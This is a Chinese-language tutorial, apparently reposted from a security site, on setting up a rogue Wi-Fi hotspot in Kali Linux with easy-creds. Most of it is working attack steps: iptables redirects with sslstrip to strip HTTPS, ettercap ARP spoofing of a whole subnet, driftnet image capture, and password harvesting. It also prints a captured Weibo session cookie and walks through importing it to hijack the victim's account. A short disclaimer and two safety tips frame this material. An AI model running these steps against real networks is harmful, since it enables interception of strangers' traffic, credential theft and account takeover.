如何在Kali Linux中搭建釣魚熱點


文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用!

0×00 實驗環境

操作系統:Kali 1.0 (VM)

FackAP: easy-creds

硬件:NETGEAR wg111 v3 RTL8187B 網卡(kali下免驅)

靶機:安卓、iPhone設備

0×01 環境搭建

git clone https://github.com/brav0hax/easy-creds
cd easy-creds

bash install.sh

選擇第一項:1.  Debian/Ubuntu and derivatives

這一步設定easy-creds的安裝目錄:/opt ,安裝過程中會從國外網站下載一些依賴包以及第三方軟件,這一過程中建議通過翻牆來節省時間。

當看到提示happy hunting的時候便意味着安裝完成了:

0×02

根據上述步驟已將easy-creds安裝到Kali中,我們可以在終端執行easy-creds運行,接下來我們需要對軟件、系統參數進行一些修改:

2.1 修改etter uid、gid值 &開啟iptables端口轉發

kali中自帶了中間人攻擊的一些工具,如:ettercap,在第一次使用ettercap時,我們需要修改其默認配置文件/etc/ettercap/etter.conf: (有的系統中,ettercap的配置文件路徑為:/etc/etter.conf)

需要我們把ettercap的ec_uid、ec_gid的值修改為0:以系統最高權限運行。

另外,如果系統使用了iptables防火牆,還需取消#后的注釋使iptables配置生效,將:

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

修改為:

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2.2 開啟ipv4數據包轉發:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.3 配置iptables規則:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 

2.4 運行sslstrip

sslstrip -l 8080

2.5 開啟網絡管理 &重啟網絡管理服務

vim /etc/NetworkManager/NetworkManager.conf

將managed=false修改為managed=true:

重啟網絡管理服務:

service network-manager restart

0×03 運行easy-creds

終端執行:easy-creds

選擇第三項:FakeAP Attacks

選擇第一項:FakeAP Attack Static

y確定包含sidejacking劫持攻擊:

下一步選擇WIFI網絡的流量入口:eth0

選擇無線網絡接口&設備:wlan0

設定WIFI-SSID:CMCC

WIFI網絡信道:5

mon0

n

at0

n

為無線網絡設置網段:192.168.88.0/24

設定DNS服務器:8.8.8.8

完成之后,easy-creds啟動了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:

紅色部分顯示安卓、iPhone靶機成功連入釣魚WIFI環境,URL snarf也捕獲到了兩台設備正在訪問的網站網址等信息。

0×04 Hacking for fun

4.1 “綿羊牆”

driftnet是一款簡單而使用的圖片捕獲工具,能夠捕獲到網絡數據包中的圖片,同時支持抓取和顯示音頻文件,可用於捕獲微信朋友圈中的相片、微博配圖等等。

driftnet -i at0   (-i指定監聽的網絡接口)

4.2 MITM中間人攻擊

Ettercap利用ARP欺騙,監聽同一網段內某台主機甚至所有主機的網絡通信流量,抓取其它主機通信流量中的Cookie等信息:

ettercap -i at0 -T -M arp:remote /192.168.88.1/ //  (通過ARP欺騙,監聽192.168.88.0/24 網段所有主機通信流量)

4.3 利用Cookie登陸受害者賬戶

利用Cookie前,我們需要下載瀏覽器的一些Cookie相關的插件,如cookie manager、cookie editor。

這里我使用了:Modify Headers for Google Chrome

4.3.1 捕獲到的微博Cookie數據:

Wed Jul 20 11:27:50 2016
TCP  192.168.88.100:50664 --> 180.149.139.248:80 | AP

GET /unread?t=1468985586846 HTTP/1.1.
Host: m.weibo.cn.
Connection: keep-alive.
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile.
Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.
Accept: application/json, text/javascript, */*; q=0.01.
X-Requested-With: XMLHttpRequest.
Accept-Language: zh-cn.
Referer: http://m.weibo.cn/.
Accept-Encoding: gzip,deflate.
.

4.3.2 清空瀏覽器內weibo.cn的Cookie:

4.3.3 導入微博Cookie

選擇右上角+ 增加Cookie:

Action=Modify 
Name=Cookie 
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.

4.3.4 訪問m.weibo.cn:

0×05 嗅探數據包&協議分析

5.1 wireshark

5.2 tcpdump

tcpdump -i at0 -w sniffe.dump

5.3 ssltrips嗅探https加密流量

捕獲HTTPS通信傳輸中的賬號、密碼:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
ssltrips -p -l 8080 -w log.txt

0×06 注意事項

1.easy-creds生成的日志文件過大,建議在/tmp目錄中啟動easy-creds(即使忘了刪easy-creds日志,系統重啟后自動清空/tmp目錄)

2.如果連入釣魚熱點的設備不能聯網了及時檢查:/proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

當發現值為0的時候需再次執行:

echo 1 >> /proc/sys/net/ipv4/ip_forward

3.easy-creds目前不兼容kali 2.0,所以不建議在kali 2.0 系統中安裝easy-creds;

4.目前測試easy-creds只支持移動設備接入WIFI,測試過程中發現筆記本(win 7)接入WIFI不能聯網。

0×07 安全建議

1.不隨便連陌生 WIFI,及時注銷登錄狀態可使Cookie時效;

2.不使用WIFI時及時關閉手機WIFI,避免自動連入諸如CMCC這一類的公共開放無線熱點。

0×08 refer

Ettercap Man In The MIddle Attack + SSL Strip

原文地址:http://www.freebuf.com/articles/wireless/108830.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM